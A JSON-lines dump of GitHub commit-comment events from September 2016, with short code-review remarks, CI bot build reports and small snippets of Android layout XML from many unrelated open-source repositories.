{"id":"4560310198","type":"CommitCommentEvent","actor":{"login":"DimStar77"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":19013824,"position":55,"line":55,"path":"tests/x11/gdm_session_switch.pm","commit_id":"71200824891df41a06b2bf6d5e9ab33bf848d161","created_at":"2016-09-14T07:31:38Z","updated_at":"2016-09-14T07:31:38Z","body":"On TW, the 'classic' modes are not installed by default - so the test needs to take care to install the package as needed\r\n\r\nadditionally, TW is not based on SLE and SLE-Classic is not available for Tumbleweed"}},"created_at":"2016-09-14T07:31:38Z"}
{"id":"4560311158","type":"CommitCommentEvent","actor":{"login":"alastair"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19013826,"position":27,"line":45,"path":"support/views.py","commit_id":"b2d01aa06cb4a1ccb6b50bc788ac19a97bee1ed7","created_at":"2016-09-14T07:31:53Z","updated_at":"2016-09-14T07:31:53Z","body":"I think it's OK to have it here, if this is a utility function that can be used in more than one place"}},"created_at":"2016-09-14T07:31:53Z"}
{"id":"4560312702","type":"CommitCommentEvent","actor":{"login":"yvasilyev92"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":19013831,"position":null,"line":null,"path":null,"commit_id":"1d424934d97c8c772978837c0eebb292cbc7f808","created_at":"2016-09-14T07:32:16Z","updated_at":"2016-09-14T07:32:16Z","body":"Thats not right. For some reason my viewgroups were cut out.\r\nThe posts are missing the layouts. Here is how it should be.\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<FrameLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\r\n    xmlns:tools=\"http://schemas.android.com/tools\"\r\n    android:layout_width=\"match_parent\"\r\n    android:layout_height=\"match_parent\"\r\n    tools:context=\"com.example.android.sunshine.app.MainActivity\"\r\n    android:id=\"@+id/container\">\r\n</FrameLayout>\r\n\r\nand also fragment_main.xml\r\n\r\n<FrameLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\r\n    xmlns:tools=\"http://schemas.android.com/tools\"\r\n    android:layout_width=\"match_parent\"\r\n    android:layout_height=\"match_parent\"\r\n    tools:context=\".ForecastFragment\">\r\n\r\n    <!-- TODO: Update blank fragment layout -->\r\n    <ListView\r\n        android:layout_width=\"match_parent\"\r\n        android:layout_height=\"match_parent\"\r\n        android:id=\"@+id/listview_forecast\" />\r\n\r\n</FrameLayout>\r\n\r\n\r\nand lastly list_item_forcast.xml\r\n\r\n\r\n?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<TextView xmlns:android=\"http://schemas.android.com/apk/res/android\"\r\n    android:layout_width=\"match_parent\"\r\n    android:layout_height=\"wrap_content\"\r\n    android:id=\"@+id/list_item_forecast_textview\"\r\n    android:gravity=\"center_vertical\"\r\n    android:minHeight=\"?android:attr/listPreferredItemHeight\">\r\n\r\n</TextView>\r\n"}},"created_at":"2016-09-14T07:32:16Z"}
{"id":"4560314079","type":"CommitCommentEvent","actor":{"login":"DimStar77"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":19013836,"position":63,"line":63,"path":"tests/x11/gdm_session_switch.pm","commit_id":"71200824891df41a06b2bf6d5e9ab33bf848d161","created_at":"2016-09-14T07:32:39Z","updated_at":"2016-09-14T07:32:39Z","body":"Very similar - there is work going on to not have icewm  installed on a default GNOME setup, so switching to it will only be possible after instllation"}},"created_at":"2016-09-14T07:32:39Z"}
{"id":"4560314929","type":"CommitCommentEvent","actor":{"login":"a-yamauchi217"},"repo":{"name":"a-yamauchi217/Camp-Challenge"},"payload":{"comment":{"id":19013837,"position":null,"line":null,"path":null,"commit_id":"9566c8d211deb9fb6c83b314d6839da1cd015cc4","created_at":"2016-09-14T07:32:52Z","updated_at":"2016-09-14T07:32:52Z","body":"添田さん\r\n\r\nお忙しい中、添削して頂きありがとうございます。\r\nフローチャートの課題９、１０またアルゴリズムの課題１（バブルソート）のPDFを修正致しました。\r\nお時間のある時にご確認頂ければと思います。\r\n\r\n山内\r\n\r\n\r\n2016年9月14日 14:02 gg-soeda <notifications@github.com>:\r\n\r\n> 添田です。\r\n> まず、フローチャートの分岐についてなのですが、ひし形の左側に分岐するのではなく、右側に分岐するようにお願いします。（PDF修正しなくても良いです。）\r\n> ┌◇ ⇒ ◇┐\r\n>\r\n> 課題9について\r\n> 最初に、入力値をXという箱で受けてますが、このXという箱は「TOPという文字が入っているか」のチェックの後、\r\n> 数字のカウントアップに利用しています。なので、できれば最初の入力値を受ける箱は別名にしたいですね。\r\n>\r\n> 課題10について\r\n> わかり辛くて申し訳ないのですが、「1に1加算してから表示」なので、数値のカウントアップのタイミングを繰り返し処理の最初に実施し\r\n> てください。1～7ではなく、2～7が表示される形ですね。また、偶数奇数の判定後、表示以外の処理は一緒なので、\r\n> 表示後の処理は１つにしても問題ありませんよ。\r\n>\r\n> 課題11について\r\n> 自販機のフローとして、出来てます。時間があれば、それぞれの処理についてもっと細かく考えてみてください。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/a-yamauchi217/Camp-Challenge/commit/9566c8d211deb9fb6c83b314d6839da1cd015cc4#commitcomment-19012773>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AVHZboMoRn_feHZExzMvkt6kkaB9VVXTks5qp4AAgaJpZM4J8Zua>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-14T07:32:52Z"}
{"id":"4560321072","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19013854,"position":null,"line":null,"path":null,"commit_id":"d1330a0bfe6e42c227c3115b40299a6035bf4190","created_at":"2016-09-14T07:34:25Z","updated_at":"2016-09-14T07:34:25Z","body":"versionNumbers (mitchute) - Win64-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T07:34:25Z"}
{"id":"4560321288","type":"CommitCommentEvent","actor":{"login":"SyntacticSugarSS"},"repo":{"name":"SyntacticSugarSS/learn"},"payload":{"comment":{"id":19013855,"position":null,"line":null,"path":null,"commit_id":"a53e75fd7217db0df58948f923bff11b34186349","created_at":"2016-09-14T07:34:28Z","updated_at":"2016-09-14T07:34:28Z","body":"1"}},"created_at":"2016-09-14T07:34:28Z"}
{"id":"4560321644","type":"CommitCommentEvent","actor":{"login":"linnhultqvist"},"repo":{"name":"linnhultqvist/hello-world"},"payload":{"comment":{"id":19013858,"position":null,"line":null,"path":null,"commit_id":"723c5c872d67f7b89660b544357cbac36bd8f1c2","created_at":"2016-09-14T07:34:33Z","updated_at":"2016-09-14T07:34:33Z","body":"Nytt."}},"created_at":"2016-09-14T07:34:33Z"}
{"id":"4560324119","type":"CommitCommentEvent","actor":{"login":"psychon"},"repo":{"name":"jprellberg/apt"},"payload":{"comment":{"id":19013865,"position":89,"line":136,"path":"src/module/uniol/apt/analysis/coverability/CoverabilityGraph.java","commit_id":"164e26224f476ec6daf8cffd594e043d29d2cef9","created_at":"2016-09-14T07:35:11Z","updated_at":"2016-09-14T07:35:11Z","body":"This doesn't really work. The `CoverabilityGraph` instance is cached as an extension on the `PetriNet` and a new one is only created if the cache doesn't provide one. However, this means that this function now only sometimes returns a `CoverabilityGraph` with the given `interrupter`. If the cache is non-empty, then the `interrupter` is ignored.\r\n\r\nThus, I fear/guess that for `CoverabilityGraph` the `ModuleInterrupter` cannot be given as an argument to the constructor, but needs to be an (optional?) argument to `calculateNodes`, `toReachabilityLTS()` and `toCoverabilityLTS()`."}},"created_at":"2016-09-14T07:35:11Z"}
{"id":"4560324190","type":"CommitCommentEvent","actor":{"login":"jiongjiongwang"},"repo":{"name":"ko889910/jllw"},"payload":{"comment":{"id":19013866,"position":null,"line":null,"path":null,"commit_id":"f9e4349a797ce8b34ff6e666f1d4fd6c722b5f7f","created_at":"2016-09-14T07:35:12Z","updated_at":"2016-09-14T07:35:12Z","body":"??? what are you fuck for?"}},"created_at":"2016-09-14T07:35:12Z"}
{"id":"4560324449","type":"CommitCommentEvent","actor":{"login":"mvenkatsriram"},"repo":{"name":"mvenkatsriram/SWD_Recorder"},"payload":{"comment":{"id":19013867,"position":null,"line":null,"path":null,"commit_id":"667a459c5ba32dbb969efb5ddb2d28d519f0fe1b","created_at":"2016-09-14T07:35:15Z","updated_at":"2016-09-14T07:35:15Z","body":"error"}},"created_at":"2016-09-14T07:35:15Z"}
{"id":"4560325542","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19013870,"position":null,"line":null,"path":null,"commit_id":"5fede86b4645806d5564245d842380609000251c","created_at":"2016-09-14T07:35:30Z","updated_at":"2016-09-14T07:35:30Z","body":"Related to: backdrop/backdrop-issues#1568 "}},"created_at":"2016-09-14T07:35:30Z"}
{"id":"4560327164","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013873,"position":637,"line":637,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:35:53Z","updated_at":"2016-09-14T07:35:53Z","body":"> http://api.jquery.com/jQuery.each/\r\n\r\n> http://api.jquery.com/jQuery.map/\r\n\r\n拿走不写"}},"created_at":"2016-09-14T07:35:53Z"}
{"id":"4560327917","type":"CommitCommentEvent","actor":{"login":"psychon"},"repo":{"name":"jprellberg/apt"},"payload":{"comment":{"id":19013874,"position":113,"line":167,"path":"src/module/uniol/apt/analysis/coverability/CoverabilityGraph.java","commit_id":"164e26224f476ec6daf8cffd594e043d29d2cef9","created_at":"2016-09-14T07:36:04Z","updated_at":"2016-09-14T07:36:04Z","body":"To avoid all the null checks, does it make sense to have a `NoOpInterrupter` which never throws? That one could be used instead of a null pointer where needed."}},"created_at":"2016-09-14T07:36:04Z"}
{"id":"4560332597","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19013885,"position":null,"line":null,"path":null,"commit_id":"18ba828728c0fdea5ff74379f2ca91fef5172cb0","created_at":"2016-09-14T07:37:12Z","updated_at":"2016-09-14T07:37:12Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T07:37:12Z"}
{"id":"4560334551","type":"CommitCommentEvent","actor":{"login":"alidenjer"},"repo":{"name":"alidenjer/denjer"},"payload":{"comment":{"id":19013889,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-14T07:37:40Z","updated_at":"2016-09-14T07:37:40Z","body":"255215038"}},"created_at":"2016-09-14T07:37:40Z"}
{"id":"4560340490","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19013904,"position":null,"line":null,"path":null,"commit_id":"31b0f748744b1bc957ab74ea5bdffa18a830935d","created_at":"2016-09-14T07:39:16Z","updated_at":"2016-09-14T07:39:16Z","body":"The advantages of HTTPS sort of dissolve if you just fall back to HTTP if the security fails, though."}},"created_at":"2016-09-14T07:39:16Z"}
{"id":"4560340638","type":"CommitCommentEvent","actor":{"login":"nazaninreihani"},"repo":{"name":"binary-com/mobile"},"payload":{"comment":{"id":19013906,"position":13,"line":111,"path":"www/js/pages/new-real-account-opening/components/new-account-maltainvest/new-account-maltainvest.controller.js","commit_id":"6d955cb0e8a36f292f2f58cf170097e028aa35c7","created_at":"2016-09-14T07:39:18Z","updated_at":"2016-09-14T07:39:18Z","body":"What do you suggest when they are not parent and child scopes? using a service?"}},"created_at":"2016-09-14T07:39:18Z"}
{"id":"4560341163","type":"CommitCommentEvent","actor":{"login":"ncannasse"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19013907,"position":null,"line":null,"path":null,"commit_id":"435257d6827bd55da891ef8e44ac1c1e0418a4f6","created_at":"2016-09-14T07:39:26Z","updated_at":"2016-09-14T07:39:26Z","body":"I know, I'm just too lazy+busy to take time to setup it for now :)"}},"created_at":"2016-09-14T07:39:26Z"}
{"id":"4560346112","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19013914,"position":7,"line":238,"path":"resources/qml/SidebarHeader.qml","commit_id":"ec587eb0dd76aa88178c6f923e94c08ab09b0ae2","created_at":"2016-09-14T07:40:42Z","updated_at":"2016-09-14T07:40:42Z","body":"Currently this is printing empty messages in my console every time I switch tabs:\r\n\r\n    qml:"}},"created_at":"2016-09-14T07:40:42Z"}
{"id":"4560350441","type":"CommitCommentEvent","actor":{"login":"Phoebe-G"},"repo":{"name":"Phoebe-G/wysihtml"},"payload":{"comment":{"id":19013920,"position":null,"line":null,"path":null,"commit_id":"c4068670cc551aab25568e5517e971f6bca9a35f","created_at":"2016-09-14T07:41:45Z","updated_at":"2016-09-14T07:41:45Z","body":"WYSIHTML editors created on textareas inside (eg) dialog boxes were not being properly destroyed when the dialog is closed.\r\n\r\nBrowser stacktrace after destroying the dialog/container was:\r\n> wysihtml.js:10009 Uncaught TypeError: Cannot read property 'document' of null\r\n>     getDocument @ wysihtml.js:10009\r\n>     wysihtml.Editor.wysihtml.lang.Dispatcher.extend.parse @ wysihtml.js:16047\r\n>     wysihtml.views.Textarea.wysihtml.views.View.extend.setValue @ wysihtml.js:15793\r\n>     wysihtml.views.Synchronizer.Base.extend.fromComposerToTextarea @ wysihtml.js:15638\r\n>     (anonymous function) @ wysihtml.js:15678\r\n\r\nNote:\r\nAdding `DOMNodeRemovedFromDocument` to the array passed to the `addEventListener` call on line 599 is insufficient for this fix."}},"created_at":"2016-09-14T07:41:45Z"}
{"id":"4560352440","type":"CommitCommentEvent","actor":{"login":"dy779"},"repo":{"name":"dy779/vpn"},"payload":{"comment":{"id":19013923,"position":null,"line":null,"path":null,"commit_id":"07acb23b67ccf7af740a354740afb3231f8a5c08","created_at":"2016-09-14T07:42:17Z","updated_at":"2016-09-14T07:42:17Z","body":"1222"}},"created_at":"2016-09-14T07:42:17Z"}
{"id":"4560353284","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19013924,"position":40,"line":0,"path":"js/js.libraries/src/core/collections/AbstractCollection.kt","commit_id":"29c146ab52bf28ebb20048e8a7b61b8ca499c252","created_at":"2016-09-14T07:42:27Z","updated_at":"2016-09-14T07:42:27Z","body":"Yes, it should be public in JVM"}},"created_at":"2016-09-14T07:42:27Z"}
{"id":"4560354939","type":"CommitCommentEvent","actor":{"login":"HennieBez"},"repo":{"name":"HennieBez/Amended-R-Mini-Project"},"payload":{"comment":{"id":19013928,"position":null,"line":null,"path":null,"commit_id":"80761e81826040b996068e3b68b9afe0bcf3b726","created_at":"2016-09-14T07:42:53Z","updated_at":"2016-09-14T07:42:53Z","body":"In addition to the above comment, I also worked on the _outlay_ of my code.\r\n\r\nI.e. to start out a _chunk_ of code by `<- dataframe %<%`\r\n\r\nThis helps to read and understand the code better for myself to follow-up on. It took me quite a while to get into the swing of things this morning purely because my own _code_ is all over the place"}},"created_at":"2016-09-14T07:42:53Z"}
{"id":"4560357818","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19013933,"position":null,"line":null,"path":null,"commit_id":"7a7309219cae70e14f58e904591a77360bfbc985","created_at":"2016-09-14T07:43:32Z","updated_at":"2016-09-14T07:43:32Z","body":"i think, it would be better to send the log directly to you."}},"created_at":"2016-09-14T07:43:32Z"}
{"id":"4560358984","type":"CommitCommentEvent","actor":{"login":"akoenig"},"repo":{"name":"realityfunk/experiment-1"},"payload":{"comment":{"id":19013935,"position":32,"line":56,"path":"webpack/index.js","commit_id":"f2089bcf0099f4508a23659d5fa7b2ec3a3db39f","created_at":"2016-09-14T07:43:51Z","updated_at":"2016-09-14T07:43:51Z","body":"Alter! Mach Urlaub :D LGTM!"}},"created_at":"2016-09-14T07:43:51Z"}
{"id":"4560361087","type":"CommitCommentEvent","actor":{"login":"akoenig"},"repo":{"name":"realityfunk/experiment-1"},"payload":{"comment":{"id":19013937,"position":null,"line":null,"path":null,"commit_id":"f2089bcf0099f4508a23659d5fa7b2ec3a3db39f","created_at":"2016-09-14T07:44:21Z","updated_at":"2016-09-14T07:44:21Z","body":"Alter! Mach Urlaub :D LGTM!"}},"created_at":"2016-09-14T07:44:21Z"}
{"id":"4560363083","type":"CommitCommentEvent","actor":{"login":"grhawk"},"repo":{"name":"epfl-cosmo/i-pi-dev"},"payload":{"comment":{"id":19013942,"position":null,"line":null,"path":null,"commit_id":"61270a30fa61fa4e7b52e11acbdda3e26b600839","created_at":"2016-09-14T07:44:49Z","updated_at":"2016-09-14T07:44:49Z","body":"Hello,\r\nany idea/code/comment is welcome... \r\nI do not see the need of a new branch...  but as you prefer..."}},"created_at":"2016-09-14T07:44:49Z"}
{"id":"4560363366","type":"CommitCommentEvent","actor":{"login":"panchengjun"},"repo":{"name":"panchengjun/jcp"},"payload":{"comment":{"id":19013943,"position":null,"line":null,"path":null,"commit_id":"91b3404367afaeef0e271c16860ffa1fbc88a2b1","created_at":"2016-09-14T07:44:52Z","updated_at":"2016-09-14T07:44:52Z","body":"xxxxxxxxxxxx"}},"created_at":"2016-09-14T07:44:52Z"}
{"id":"4560365589","type":"CommitCommentEvent","actor":{"login":"Joohansson"},"repo":{"name":"ignacionelson/ProjectSend"},"payload":{"comment":{"id":19013948,"position":null,"line":null,"path":null,"commit_id":"e67fa314abcc45347b67a9a43297211218b70117","created_at":"2016-09-14T07:45:26Z","updated_at":"2016-09-14T07:45:26Z","body":"I can't upload a file with same name as previous uploaded file after this change. Nothing happens when pressing continue after the upload. I don't know how to fix that. Can you please verify that?"}},"created_at":"2016-09-14T07:45:26Z"}
{"id":"4560368663","type":"CommitCommentEvent","actor":{"login":"magopian"},"repo":{"name":"n1k0/kinto-elm-experiments"},"payload":{"comment":{"id":19013949,"position":12,"line":12,"path":"src/View.elm","commit_id":"bb8fc0eb28f8f5a21e2d4306360ee85692db5ad1","created_at":"2016-09-14T07:46:13Z","updated_at":"2016-09-14T07:46:13Z","body":"typo in the name ;) s/Lats/Last/"}},"created_at":"2016-09-14T07:46:13Z"}
{"id":"4560368725","type":"CommitCommentEvent","actor":{"login":"andreip"},"repo":{"name":"Crowdbooster/raven-python"},"payload":{"comment":{"id":19013950,"position":null,"line":null,"path":null,"commit_id":"3effb5a92c3ee3c4dc01452e9bb1bf1a93ad77a7","created_at":"2016-09-14T07:46:14Z","updated_at":"2016-09-14T07:46:14Z","body":"Having this alternative done locally until PR 778 in upstream repo is added, or an alternative fix."}},"created_at":"2016-09-14T07:46:14Z"}
{"id":"4560373055","type":"CommitCommentEvent","actor":{"login":"Exulansis"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":19013962,"position":4,"line":34,"path":"src/js/lib/agents/acl.js","commit_id":"6fa4509078095f69de925b059c927401ac7da9d9","created_at":"2016-09-14T07:47:17Z","updated_at":"2016-09-14T07:47:17Z","body":"@axelchalon But the Catch on line 34 throws a new error which I assume then triggers the catch on line 47 directly, or is that wrong? So we catch the error here and bounce it to the catch on line 47 directly."}},"created_at":"2016-09-14T07:47:17Z"}
{"id":"4560373932","type":"CommitCommentEvent","actor":{"login":"stinos"},"repo":{"name":"lvandeve/lodepng"},"payload":{"comment":{"id":19013965,"position":null,"line":null,"path":null,"commit_id":"ac8f8863c609f34b69d629ed72d6a234afeb11d5","created_at":"2016-09-14T07:47:28Z","updated_at":"2016-09-14T07:47:28Z","body":"Yeah I wonder as well. Most compilers (and likely all the ones lodepng was made to work with) support it and it's less error prone (obligatory SO question http://stackoverflow.com/questions/1143936/pragma-once-vs-include-guards). I do wonder though why in this header file the pragma isn't at the top?"}},"created_at":"2016-09-14T07:47:28Z"}
{"id":"4560374428","type":"CommitCommentEvent","actor":{"login":"phako"},"repo":{"name":"renesas-rcar/gst-plugins-bad"},"payload":{"comment":{"id":19013966,"position":null,"line":null,"path":null,"commit_id":"c3ae893fb2a8febb59fe87eecd3800c7838c49fa","created_at":"2016-09-14T07:47:36Z","updated_at":"2016-09-14T07:47:36Z","body":"Hi,\r\n\r\nthe redraw_pending flag is not reset. If you play a second video from the same application (e.g. usign gst-play-1.0), it will lock up when switching to the second video because it waits for a frame forever"}},"created_at":"2016-09-14T07:47:36Z"}
{"id":"4560378260","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19013978,"position":null,"line":null,"path":null,"commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-14T07:48:33Z","updated_at":"2016-09-14T07:48:33Z","body":"https://ci.appveyor.com/project/lotem/librime/build/feature/charset%20build%2013\r\nhas this build error on Windows\r\n\r\n    C:\\projects\\librime\\src\\gear\\charset_translator.cc(8): fatal error C1083: Cannot open include file: 'endian.h': No such file or directory [C:\\projects\\librime\\build\\src\\rime.vcxproj]\r\n"}},"created_at":"2016-09-14T07:48:33Z"}
{"id":"4560378564","type":"CommitCommentEvent","actor":{"login":"floli"},"repo":{"name":"precice/precice"},"payload":{"comment":{"id":19013980,"position":4,"line":389,"path":"src/m2n/PointToPointCommunication.cpp","commit_id":"359e858ea4c8304cd3809e37a1b9a284014fdf43","created_at":"2016-09-14T07:48:37Z","updated_at":"2016-09-14T07:48:37Z","body":"Please use ```CHECK(...)``` instead:\r\n```\r\nCHECK(utils::MasterSlave::_masterMode || utils::MasterSlave::_slaveMode,\r\n               \"You can only use a point-to-point communication between two participants which both use a master. Please use distribution-type gather-scatter instead.\");\r\n```\r\nJust like preciceCheck, but without the second argument ```methodname```."}},"created_at":"2016-09-14T07:48:37Z"}
{"id":"4560382430","type":"CommitCommentEvent","actor":{"login":"floli"},"repo":{"name":"precice/precice"},"payload":{"comment":{"id":19013989,"position":22,"line":326,"path":"src/precice/impl/SolverInterfaceImpl.cpp","commit_id":"359e858ea4c8304cd3809e37a1b9a284014fdf43","created_at":"2016-09-14T07:49:33Z","updated_at":"2016-09-14T07:49:33Z","body":"Same for ```preciceInfo````, use ```INFO(message)```."}},"created_at":"2016-09-14T07:49:33Z"}
{"id":"4560389008","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014006,"position":null,"line":null,"path":null,"commit_id":"bb5774b259237b5df719cc66f8927494eab6ec6f","created_at":"2016-09-14T07:51:13Z","updated_at":"2016-09-14T07:51:13Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-14T07:51:13Z"}
{"id":"4560389026","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014007,"position":null,"line":null,"path":null,"commit_id":"557b83428e808f8afaea8c540eb1adc24d557427","created_at":"2016-09-14T07:51:13Z","updated_at":"2016-09-14T07:51:13Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-14T07:51:13Z"}
{"id":"4560389032","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014008,"position":null,"line":null,"path":null,"commit_id":"b4844cf8813070b95bce4b34a74c29d89ea79c73","created_at":"2016-09-14T07:51:13Z","updated_at":"2016-09-14T07:51:13Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-14T07:51:13Z"}
{"id":"4560389045","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014009,"position":null,"line":null,"path":null,"commit_id":"8e52a04b99ac8b1495367e78836c04025ec4e35d","created_at":"2016-09-14T07:51:13Z","updated_at":"2016-09-14T07:51:13Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-14T07:51:13Z"}
{"id":"4560389064","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014010,"position":null,"line":null,"path":null,"commit_id":"7447a67af53664dfefb1579a75c030edb13e827c","created_at":"2016-09-14T07:51:14Z","updated_at":"2016-09-14T07:51:14Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-14T07:51:14Z"}
{"id":"4560390247","type":"CommitCommentEvent","actor":{"login":"pplux"},"repo":{"name":"bkaradzic/bx"},"payload":{"comment":{"id":19014016,"position":null,"line":null,"path":null,"commit_id":"469a035b2afb22dcbb9050f07794091a0aba229e","created_at":"2016-09-14T07:51:30Z","updated_at":"2016-09-14T07:51:30Z","body":"that solves the issue :)"}},"created_at":"2016-09-14T07:51:30Z"}
{"id":"4560393922","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19014022,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-14T07:52:23Z","updated_at":"2016-09-14T07:52:23Z","body":"Louis, can you please revert this commit and check for a different approach?! This breaks template backward compatibility."}},"created_at":"2016-09-14T07:52:23Z"}
{"id":"4560396634","type":"CommitCommentEvent","actor":{"login":"S-mardii"},"repo":{"name":"tinymce/tinymce"},"payload":{"comment":{"id":19014033,"position":5,"line":5,"path":"tests/tinymce/text/Zwsp.js","commit_id":"1696e387e818d9c3f4e2e2d8871f0218208a0212","created_at":"2016-09-14T07:53:02Z","updated_at":"2016-09-14T07:53:02Z","body":"What's wrong with u200b?"}},"created_at":"2016-09-14T07:53:02Z"}
{"id":"4560397928","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19014036,"position":719,"line":719,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:53:20Z","updated_at":"2016-09-14T07:53:20Z","body":"同上面某处，{}不会改变上下文；\r\n\r\n另外，你这个方法既然叫做escPressed，e.which的判断不是应该在外面做好吗？你这样写，这个方法就应该叫做onKeyDown才对"}},"created_at":"2016-09-14T07:53:20Z"}
{"id":"4560398824","type":"CommitCommentEvent","actor":{"login":"Joohansson"},"repo":{"name":"ignacionelson/ProjectSend"},"payload":{"comment":{"id":19014040,"position":null,"line":null,"path":null,"commit_id":"868c347cf3e90e9c4c57511e0a32ed40fd2e10c7","created_at":"2016-09-14T07:53:32Z","updated_at":"2016-09-14T07:53:32Z","body":"This fix `Session_write_close();` also applies to download.php, right?"}},"created_at":"2016-09-14T07:53:32Z"}
{"id":"4560400972","type":"CommitCommentEvent","actor":{"login":"phistuck"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19014044,"position":null,"line":null,"path":null,"commit_id":"1f3bc9ae979f3076b06eee2c8f87796ed6fd3607","created_at":"2016-09-14T07:54:04Z","updated_at":"2016-09-14T07:54:04Z","body":"Since this is in the default externs - does any browser support all of those (even most of those)?"}},"created_at":"2016-09-14T07:54:04Z"}
{"id":"4560404032","type":"CommitCommentEvent","actor":{"login":"kieranjol"},"repo":{"name":"AnjaMahler/IFIscripts"},"payload":{"comment":{"id":19014050,"position":null,"line":null,"path":null,"commit_id":"92bf2d5c54da369a215e7c8c7e9a90f0ae7826fe","created_at":"2016-09-14T07:54:51Z","updated_at":"2016-09-14T07:54:51Z","body":"Hiiiiiii, pull request plz ;)@ecodonohoe "}},"created_at":"2016-09-14T07:54:51Z"}
{"id":"4560409232","type":"CommitCommentEvent","actor":{"login":"adamdickmeiss"},"repo":{"name":"folio-org/okapi"},"payload":{"comment":{"id":19014058,"position":73,"line":73,"path":"okapi-common/src/main/java/org/folio/okapi/common/XOkapiHeaders.java","commit_id":"ba97c7630fe355b4a334fab8382aaaa9cdc9e704","created_at":"2016-09-14T07:56:04Z","updated_at":"2016-09-14T07:56:04Z","body":"Right."}},"created_at":"2016-09-14T07:56:04Z"}
